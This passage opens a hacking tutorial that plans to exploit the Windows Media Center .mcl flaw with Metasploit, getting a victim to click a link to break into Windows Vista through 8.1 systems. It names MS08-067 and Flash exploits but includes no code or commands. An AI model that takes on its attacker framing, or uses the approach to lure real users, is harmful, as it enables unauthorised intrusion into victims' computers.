As hackers, we need to take a multipronged approach to gaining access to a system. Gone are the days ofMS08-067that would basically allow you to remotely take control of any Windows XP, 2003, or 2008 system. Now we have to be more crafty to find a
way to gain access to the system.
TheAdobe flash exploitshave been, and continue to be, excellent gateways into Windows systems—if we can get
the user to click on a URL link. Many applications have vulnerabilities, but before attacking those we need to know that they are on the system. That's whyreconnaissanceis so critical
This hack is targeted to the Media Center on every Windows Vista, 7, 8, and 8.1 system. That makes it ubiquitous, but we
still need to send the the victim an .mcl link to gain access to their system.Metasploitrecently added an exploit to accomplish this
task and that is what we will be using here (another exploit that accomplishes the same thing without the Metasploit framework does exist in theExploit
Database).